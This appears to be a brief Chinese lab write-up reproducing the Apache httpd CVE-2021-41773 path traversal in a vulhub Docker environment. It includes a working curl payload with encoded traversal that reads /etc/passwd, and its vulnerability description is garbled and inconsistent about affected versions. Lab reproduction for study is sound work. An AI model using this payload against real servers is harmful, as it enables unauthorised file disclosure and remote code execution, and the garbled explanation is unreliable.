vulhub-CVE-2021-41773

漏洞原理

Apache在2.4.49版本中,引入路径体验,该漏洞仅影响具有“要求全部拒绝”访问权限的 Apache HTTP Server 2.4.49 版控制配置禁用。

漏洞危害

可利用漏洞进行远程RCE,访问web服务器上文档根目录之外的任意文件。泄露CGI。

影响版本

Apache HTTPd 2.4.49/2.4.50版本

环境搭建和测试

切换到vulhub/httpd/CVE-2021-41773,启动环境

docker-compose up -d

浏览器访问ip:8080
vulhub-CVE-2021-41773_第1张图片
使用curl发送payload

curl -v --path-as-is http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

vulhub-CVE-2021-41773_第2张图片

参考文献

shodan新手使用指南
批量

你可能感兴趣的:(漏洞复现,安全,web安全)